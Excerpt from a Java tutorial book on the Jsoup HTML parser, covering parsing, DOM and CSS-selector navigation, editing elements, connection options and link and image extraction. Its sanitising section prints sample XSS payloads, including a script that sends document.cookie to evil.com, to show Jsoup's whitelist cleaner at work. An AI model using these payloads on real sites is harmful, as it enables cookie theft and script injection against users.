Welcome to Instant Jsoup How-to. As you look around, you will see that many websites and services provide information through RSS, Atom, or even through a web service API; however, lots of sites don't provide such facilities. That is the reason why many HTML parsers arise to support the ability of web scraping. Jsoup, one among the popular HTML parsers for Java developers, stands as a powerful framework that gives developers an easy way to extract and transform HTML content. This book is therefore written with all the recipes that are needed to grab web information.
HTML data for parsing can be stored in different types of sources such as local file, a string, or a URI. Let's have a look at how we can handle these types of input for parsing using Jsoup.
Create the
Document
class structure from Jsoup, depending on the type of input.If the input is a string, use:
String html = "<html><head><title>jsoup: input with string</title></head><body>Such an easy task.</body></html>"; Document doc = Jsoup.parse(html);
If the input is from a file, use:
try { File file = new File("index.html"); Document doc = Jsoup.parse(file, "utf-8"); } catch (IOException ioEx) { ioEx.printStackTrace(); }
If the input is from a URL, use:
Document doc = Jsoup.connect("http://www.example.com").get();
Include the correct package at the top.
import org.jsoup.Jsoup; import.jsoup.nodes.Document;
Basically, all the inputs will be given to the Jsoup
class to parse.
For an HTML string, you just need to pass the HTML string as parameter for the method Jsoup.parse()
.
For an HTML file, there are three parameters inputted for Jsoup.parse()
. The first one is the file object, which points to the specified HTML file; the second one is the character set of the file. There is an overload of this method with an additional third parameter, Jsoup.parse(File file, String charsetName, String baseUri)
. The baseUri
URL is the URL from where the HTML file is retrieved; it is used to resolve relative paths or links.
For a URL, you need to use the Jsoup.connect()
method. Once the connection succeeds, it will return an object, thus implementing the connection interface. Through this, you can easily get the content of the URL page using the Connection.get()
method.
The previous example is pretty easy and straightforward. The results of parsing from the Jsoup
class will return a Document
object, which represents a DOM structure of an HTML page, where the root node starts from <html>
.
Besides receiving the well-formed HTML as input, Jsoup library also supports input as a body fragment. This can be seen at the following location:
http://jsoup.org/apidocs/org/jsoup/Jsoup.html#parseBodyFragment(java.lang.String)
Tip
Downloading the example code
You can download the example code files for all Packt books you have purchased from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.
As the input is ready for extraction, we will begin with HTML parsing using the DOM method.
Let's move on to the details of how it works in Jsoup.
This section will parse the content of the page at, http://jsoup.org.
The index.html
file in the project is provided if you want to have a file as input, instead of connecting to the URL.
The following screenshot shows the page that is going to be parsed:

By viewing the source code for this HTML page, we know the site structure.
The Jsoup library is quite supportive of the DOM navigation method; it provides ways to find elements and extract their contents efficiently.
Create the
Document
class structure by connecting to the URL.Document doc = Jsoup.connect("http://jsoup.org").get();
Navigate to the menu tag whose class is
nav-sections
.Elements navDivTag = doc.getElementsByClass("nav-sections");
Get the list of all menu tags that are owned by
<a>
.Elements list = navDivTag.get(0).getElementsByTag("a");
Extract content from each
Element
class in the previous menu list.for(Element menu: list) { System.out.print(String.format("[%s]", menu.html())); }
The output should look like the following screenshot after running the code:

The complete example source code for this section is placed at \source\Section02
.
Let's have a look at the navigation structure:
html > body.n1-home > div.wrap > div.header > div.nav-sections > ul > li.n1-news > a
The div class="nav-sections"
tag is the parent of the navigation section, so by using getElementsByClass("nav-sections")
, it will move to this tag. Since there is only one tag with this class value in this example, we only need to extract the first found element; we will get it at index 0 (first item of results).
Elements navDivTag = doc.getElementsByClass("nav-sections");
The Elements
object in Jsoup represents a collection (Collection<>
) or a list (List<>
); therefore, you can easily iterate through this object to get each element, which is known as an Element
object.
When at a parent tag, there are several ways to get to the children. Navigate from subtag <ul>
, and deeper to each <li>
tag, and then to the <a>
tag. Or, you can directly make a query to find all the <a>
tags. That's how we retrieved the list that we found, as shown in the following code:
Elements list = navDivTag.get(0).getElementsByTag("a");
The final part is to print the extracted HTML content of each <a>
tag.
Beware of the list
value; even if the navigation fails to find any element, it is always not null, and therefore, it is good practice to check the size of the list before doing any other task.
Additionally, the Element.html()
method is used to return the HTML content of a tag.
Jsoup is quite a powerful library for DOM navigation. Besides the following mentioned methods, the other navigation types to find and extract elements are also supported in the Element
class. The following are the common methods for DOM navigation:
Methods |
Descriptions |
---|---|
|
Finds an element by ID, including its children. |
|
Finds elements, including and recursively under the element that calls this method, with the specified tag name (in this case, |
|
Finds elements that have this class, including or under the element that calls this method. Case insensitive. |
|
Find elements that have a named attribute set. Case insensitive. This method has several relatives, such as:
|
|
Finds elements whose text matches the supplied regular expression. |
|
Finds all elements under the specified element (including self and children of children). |
There is a need to mention all methods that are used to extract content from an HTML element. The following table shows the common methods for extracting elements:
Methods |
Descriptions |
---|---|
|
This retrieves the ID value of an element. |
|
This retrieves the class name value of an element. |
|
This gets the value of a specific attribute. |
|
This is used to retrieve all the attributes. |
|
This is used to retrieve the inner HTML value of an element. |
|
This is used to retrieve the data content, usually applied for getting content from the |
|
This is used to retrieve the text content. This method will return the combined text of all inner children and removes all HTML tags, while the |
|
This retrieves the tag of the element. |
The following code will print the correspondent relative path of each <a>
tag found in the menu list to demonstrate the use of the attr()
method to get attribute content.
System.out.println("\nMenu and its relative path:"); for(Element menu: list) { System.out.println(String.format("[%s] href = %s", menu.html(), menu.attr("href"))); }
Instead of using DOM navigation, the CSS selector method is used. Basically, the CSS selector is the way to identify the element based on how it is styled in CSS. Let's see how this works.
If you don't know the CSS selector syntax yet, I suggest finding some tutorials or guidelines to learn about it first.
Now we will try to use CSS selector syntax to do the same task that DOM navigation does. Basically, it is the same code as in the previous recipe but is a little different in the way we parse the content.
Create the
Document
class structure by loading the URL:Document doc = Jsoup.connect(mUrl).get();
Select the
<div>
tag with the class attributenav-sections
:Elements navDivTag = doc.select("div.nav-sections");
Select all the
<a>
tags:Elements list = navDivTag.select("a");
Retrieve the results from the list:
for(Element menu: list) { System.out.print(String.format("[%s]", menu.html())); }
As you try to execute this code, it will produce the same result as the previous recipe by using DOM navigation.
The complete example source code for this section is available at \source\Section03
.
It works like a charm! Well, there is actually no magic here. It's just that the selector query will give the direction to the target elements and Jsoup will find it for you. The select()
method is written for this task so that you don't have to care a lot about it.
Through the query doc.select("div.nav-sections")
, the Document
class will try to find and return all the <div>
tags that have class name equal to nav-sections
.
It is even simpler when trying to find the children; Jsoup will look up every child and their children to find the tags that match the selector. That's how all the <a>
tags are selected in step 3. Compared to DOM navigation, it is much simpler to use and easier to understand. Developers should know HTML page structure in order to use the CSS selector query.
Please refer to the following pages for the usage of all CSS selector syntax to use in your application:
Basically, an HTML parser does two things—extraction and transformation. While the extraction is described in previous recipes, this recipe is going to talk about transformation or modification.
In this section, I'm going to show you how to use Jsoup library to modify the following HTML page:
<html> <head> <title>Section 04: Modify elements' contents</title> </head> <body> <h1>Jsoup: the HTML parser</h1> </body> </html>
Into this result we are adding some minor changes:
<html> <head> <title>Section 04: Modify elements' contents</title> <meta charset="utf-8" /> </head> <body class=" content"> <h1>Jsoup: the HTML parser</h1> <p align="center">Author: Johnathan Hedley</p> <p>It is a very powerful HTML parser! I love it so much...</p> </body> </html>
Perform the following tasks:
Add a
<meta>
tag to<head>
Add a
<p>
tag for body content descriptionAdd a
<p>
tag for body content authorAdd an attribute to the
<p>
tag of the authorAdd the class for the
<body>
tag
The previous tasks will be implemented in the following way:
Add a
<meta>
tag to<head>
.Element tagMetaCharset = new Element(Tag.valueOf("meta"), ""); doc.head().appendChild(tagMetaCharset);
Add a
<p>
tag for body content description.Element tagPDescription = new Element(Tag.valueOf("p"), ""); tagPDescription.text("It is a very powerful HTML parser! I love it so much..."); doc.body().appendChild(tagPDescription);
Add a
<p>
tag for body content author.tagPDescription.before("<p>Author: Johnathan Hedley</p>");
Add an attribute to the
<p>
tag of the author.Element tagPAuthor = doc.body().select("p:contains(Author)").first(); tagPAuthor.attr("align", "center");
Add a class for the
<body>
tag.doc.body().addClass("content");
The complete example source code for this section is available at \source\Section04
.
As you see, the <meta>
tag doesn't exist, so we need to create a new Element
that represents the <meta>
tag.
Element tagMetaCharset = new Element(Tag.valueOf("meta"), ""); tagMetaCharset.attr("charset", "utf-8");
The constructor of the Element
object requires two parameters; one is the Tag
object, and the other one is the base URI of the element. Usually, the base URI when creating the Tag
object is an empty string, which means you can add the base URI when you want to specify where this Tag
object should belong. One thing worth remembering is that the Tag
class doesn't have a constructor and developers need to create it through the static method Tag.valueOf(String tagName)
in order to create a Tag
object.
In the next line, the attr(String key, String value)
method is used to set the attribute value, where key
is the name of the attribute.
doc.head().appendChild(tagMetaCharset);
Instead of looking up the <head>
or <body>
tag, Jsoup already provides two methods to get these two elements directly, which makes it very convenient to append a new child to the <head>
tag. If you want to insert the <meta>
tag before <title>
, you can use the prependchild()
method instead. The call to appendChild()
will add a new element at the end of the list, while prependChild()
will add a new element as the first child of the list.
Element tagPDescription = new Element(Tag.valueOf("p"), ""); tagPDescription.text("It is a very powerful HTML parser! I love it so much..."); doc.body().appendChild(tagPDescription);
The second task is performed by the same code, basically.
Sometimes, you may find it too complicated to create objects and add to the parents; Jsoup provides support for the adding of objects to the HTML string the other way around.
tagPDescription.before("<p>Author: Johnathan Hedley</p>");
The third task is done by directly adding an HTML string as a sibling of the previous <p>
tag. The before(Node node)
method is similar to prependChild(Node node)
but applied for inserting siblings.
The next task is to add the align=center
attribute to the author <p>
tag that we've just added. Up to this point, you may have learned various ways to navigate to this tag; well, I choose one easy way to achieve the task, that is, making a CSS selector get to the first <p>
tag that contains the text Author
in its HTML content.
Element tagPAuthor = doc.body().select("p:contains(Author)").first(); tagPAuthor.attr("align", "center");
The previous line performs a pseudo selector to demonstrate, and we add the attribute to it.
The final task can easily be achieved by using the addClass(String classname)
method:
doc.body().addClass("content");
If you try to add an already existing class name, it won't add because Jsoup is smart enough to ensure that a class name only appears once in an element.
Usually, developers only work on Jsoup with default options, unaware that it provides various useful options. This recipe will acquaint you with some common-use options.
How to work with connection objects:
Setting
userAgent
: It is very important to always specifyuserAgent
when sending HTTP requests. What if the web page displays some information differently on different browsers? The result of parsing might be different.Document doc = Jsoup.connect(url).userAgent("Mozilla/5.0 (Windows NT 6.1)").get();
Especially when using Jsoup in Android, you must always specify a user agent; otherwise, it won't work properly.
When forced to work with different content types:
Document doc = Jsoup.connect(url).ignoreContentType(true).get();
By default, Jsoup only allows working with HTML and XML content type and throws exceptions for others. So, you will need to specify this properly in order to work with other content types, such as RSS, Atom, and so on.
Configure a connection timeout:
Document doc = Jsoup.connect(url).timeout(5000).get();
The default timeout for Jsoup is 3000 milliseconds (three seconds). Zero indicates an infinite timeout.
Add a parameter request to the connection:
Document doc = Jsoup.connect(url).data("author", "Pete Houston").get();
In dynamic web, you need to specify a parameter to make a request; the
data()
method works for this purpose.Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/Connection.html#data(java.lang.String, java.lang.String)
Sometimes, the request is
post
.Document doc = Jsoup.connect(url).data("author", "Pete Houston").post();
Setting the HTML output of the
Document
class.This option works through the
Document.OutputSettings
class.Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/nodes/Document.OutputSettings.html
This class outputs HTML text in a neat format with the following options:
Character set: Get/set document charset
Escape mode: Get/set escape mode of HTML output
Indentation: Get/set indent amount for pretty printing (by space count)
Outline: Enable/disable HTML outline mode
Pretty print: Enable/disable pretty printing mode
For example, display the HTML output with; charset as
utf-8
and the indentation amount as four spaces, enable the HTMLoutline
mode, and enable pretty printing:Document.OutputSettings settings = new Document.OutputSettings(); settings.charset("utf-8").indentAmount(4).outline(true).prettyPrint(true); Document doc = …// create DOM object somewhere.doc.outputSettings(settings); System.out.println(doc.html());
After setting the output format to
Document
, the content ofDocument
is processed into the according format; call theDocument.html()
method for output result.Configure the parser type.
Jsoup provides two parser types: HTML parser and XML parser.
By default, it uses HTML parser. However, if you are going to parse XML such as RSS or Atom, you should change the parser type to XML parser or it will not work properly.
Document doc = Jsoup.connect(url).parser(Parser.xmlParser()).get();
The previously mentioned options in Jsoup are important ones that the developers should know and make use of.
However, there are several more that you can try:
DataUtil
: This provides methods to load a file, or stream and transform into aDocument
object. To know more about this option, go to the following location:StringUtil
: This provides methods to handle strings; for example, to search in array, join string array, or test string. To know more about this option, go to the following location:Validate
: This provides methods to test objects, such as test empty, test null, and so on. To know more about this option, go to the following location:Entities
: This provides methods to test or get HTML entities. To know more about this option, go to the following location:Parser
: This provides methods to parse HTML intoDocument
. To know more about this option, go to the following location:
HTML documents are not always well formed. This might expose some vulnerabilities for hackers to attack, such as Cross-site scripting (XSS). Luckily, Jsoup has already provided some methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing the incorrect HTML and transforming it into the correct one. Let's have a look at how we can make a well-formed HTML document.
If you've never heard about XSS before, I suggest you learn more about it to follow this section.
Our task in this section is to clean the buggy, XSSed HTML:
<html> <head> <title>Section 05: Clean dirty HTML</title> <meta http-equiv="refresh" content="0;url=javascript:alert('xss01');"> <meta charset="utf-8" /> </head> <body onload=alert('XSS02')> <h1>Jsoup: the HTML parser</h1> <scriptsrc=http://ha.ckers.org/xss.js></script> <img """><script>alert("XSS03")</script>"> <imgsrc=# onmouseover="alert('xxs04')"> <script/XSSsrc="http://ha.ckers.org/xss.js"></script> <script/src="http://ha.ckers.org/xss.js"></script> <iframesrc="javascript:alert('XSS05');"></iframe> <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" /> <imgsrc="www.w3.org/html/logo/img/mark-only-icon.png" /> </body> </html>
If you open this file in the Chrome or Firefox browser, you will see the XSS. Just imagine that if users open this XSSed HTML and are redirected to a page that hackers have total control over, the hackers could, for example, steal users' cookies, which is very dangerous.
<img """> <script> document.location = 'http://evil.com/steal.php?cookie=' + document.cookie; </script>">
There are thousand ways for XSS attacks to occur, so you should avoid and clean it; it's time for Jsoup to do its job.
Load the
Document
class structure.File file = new File("index.html"); Document doc = Jsoup.parse(file, "utf-8");
Create a whitelist.
Whitelist allowList = Whitelist.relaxed();
Add more allowed tags and attributes.
allowList .addTags("meta", "title", "script", "iframe") .addAttributes("meta", "charset") .addAttributes("iframe", "src") .addProtocols("iframe", "src", "http", "https");
Create
Cleaner
, which will do the cleaning task.Cleaner cleaner = new Cleaner(allowList);
Clean the dirty HTML.
Document newDoc = cleaner.clean(doc);
Print the new clean HTML.
System.out.println(newDoc.html());
This is the result of the cleaning:
<html> <head> </head> <body> <h1>Jsoup: the HTML parser</h1> <script> </script> <img /> <script> </script>"> <img /> <script> </script> <script> </script> <iframe> </iframe> <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" /> <img /> </body> </html>
Indeed, the resulting HTML is very clean and there is almost no script at all.
The complete example source code for this section is available at \source\Section05
.
The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow them in the result parse tree. These allowed tags are defined in Whitelist
.
Whitelist allowList = Whitelist.relaxed(); allowList .addTags("meta", "title", "script", "iframe") .addAttributes("meta", "charset") .addAttributes("iframe", "src") .addProtocols("iframe", "src", "http", "https");
Here we define Whitelist
, which is created through the relaxed()
method and contains the following tags:
a
, b
, blockquote
, br
, caption
, cite
, code
, col
, colgroup
, dd
, dl
, dt
, em
, h1
, h2
, h3
, h4
, h5
, h6
, i
, img
, li
, ol
, p
, pre
, q
, small
, strike
, strong
, sub
, sup
, table
, tbody
, td
, tfoot
, th
, thead
, tr
, u
, and ul
If you want to add more tags, use the method addTags
(String
… tags). As you can see, the list of tags created through relaxed()
doesn't have <meta>
, <title>
, <script>
, and <iframe>
, so I added them to the list manually by using addTags()
.
If the allowed tags have the attributes, you should add the list of allowed attributes to each tag.
One special attribute is src
, which contains a URL to a file, and it's always a good practice to give a protocol to prevent inline scripting XSS. Consider the previous bug HTML line:
<iframesrc="javascript:alert('XSS05');"> </iframe>
The attribute "src"
is supposed to refer to a URL but it actually does not. The fix is to ensure the "src"
value is acquired through HTTP or HTTPS. That is what the following line means:
.addProtocols("iframe", "src", "http", "https");
You can write in chain while adding tags or attributes.
While Whitelist
provides the safe tag list, Cleaner
, on the other hand, takes Whitelist
as input to clean the input HTML:
Cleaner cleaner = new Cleaner(allowList); Document newDoc = cleaner.clean(doc);
The new Document
class is created after cleaning is done.
Cleaner
only keeps the allowed HTML tags provided by Whitelist
input; everything else is removed.
For convenience, Jsoup supports the following five predefined white-lists:
none()
: This allows only text nodes, all HTML will be strippedsimpleText()
: This allows only simple text formatting, such asb,
em,
i,
strong,
andu
basic()
: This allows a fuller range of text nodes, such asa
,b
,blockquote
,br
,cite
,code
,dd
,dl
,dt
,em
,i
,li
,ol
,p
,pre
,q
,small
,strike
,strong
,sub
,sup
,u
, andul
, and appropriate attributesbasicWithImages()
: This allows the same text tags such asbasic()
and also allows theimg
tags, with appropriate attributes, withsrc
pointing tohttp
orhttps
relaxed()
: This allows a full range of text and structural body HTML tags, such asa
,b
,blockquote
,br
,caption
,cite
,code
,col
,colgroup
,dd
,dl
,dt
,em
,h1
,h2
,h3
,h4
,h5
,h6
,i
,img
,li
,ol
,p
,pre
,q
,small
,strike
,strong
,sub
,sup
,table
,tbody
,td
,tfoot
,th
,thead
,tr
,u
, andul
If you pay more attention, you can see that everything inside the <head>
tag is removed, even when you allow them in the whitelist as shown in the previous code.
Note
The current version of Jsoup is 1.7.2; please look up GitHub, lines 45 and 46, at the following location:
https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45
The cleaner keeps and parses only <body>
, not <head>
as shown in the following code snippet:
if (dirtyDocument.body() != null) copySafeNodes(dirtyDocument.body(), clean.body());
So, if you want to clean the <head>
tag instead of removing everything, get the code, modify it, and build your own package. Add the following two lines:
if (dirtyDocument.head() != null) copySafeNodes(dirtyDocument.head(), clean.head());
We are one step closer to data crawling techniques, and this recipe is going to give you an idea on how to parse all the URLs within an HTML document.
In this task, we are going to parse all links in, http://jsoup.org.
Load the
Document
class structure from the page.Document doc = Jsoup.connect(URL_SOURCE).get();
Select all the URLs in the page.
Elements links = doc.select("a[href]");
Output the results.
for(Element url: links) { System.out.println(String.format("* [%s] : %s ", url.text(), url.attr("abs:href"))); }
The complete example source code for this section is available at \source\Section06
.
Up to this point, I think you're already familiar with CSS selector and know how to extract contents from a tag/node.
The sample code will select all <a>
tags with an href
attribute and print the output:
System.out.println(String.format("* [%s] : %s ", url.text(), url.attr("abs:href")));
If you simply print the attribute value like url.attr("href")
, the output will print exactly like the HTML source, which means some links are relative and not all are absolute. The meaning of abs:href
here is to give a resolution for the absolute URL.
In HTML, the <a>
tag is not the only one that contains a URL, there are other tags also, such as <img>
, <script>
, <iframe>
, and so on. So how are we going to get their links?
If you pay attention to these tags, you can see that they have the same common attribute, src
. So the task is quite simple: retrieve all tags containing the src
attribute inside:
Element results = doc.select("[src]");
Note
The following is a very good link listing from the Jsoup author:
http://jsoup.org/cookbook/extracting-data/example-list-links
Another well-known example of data parsing tasks nowadays is image crawling. Let's try to do it with Jsoup parser.
In this task, we're going to parse a few images from, http://www.packtpub.com/.
Load the
Document
class structure from the page.Document doc = Jsoup.connect(URL_SOURCE).get();
Select the images.
Elements links = doc.select("img[src]");
Output the results.
for(Element url: links) { System.out.println("* " + url.attr("abs:src")); }
The complete example source code for this section is available at \source\Section07
.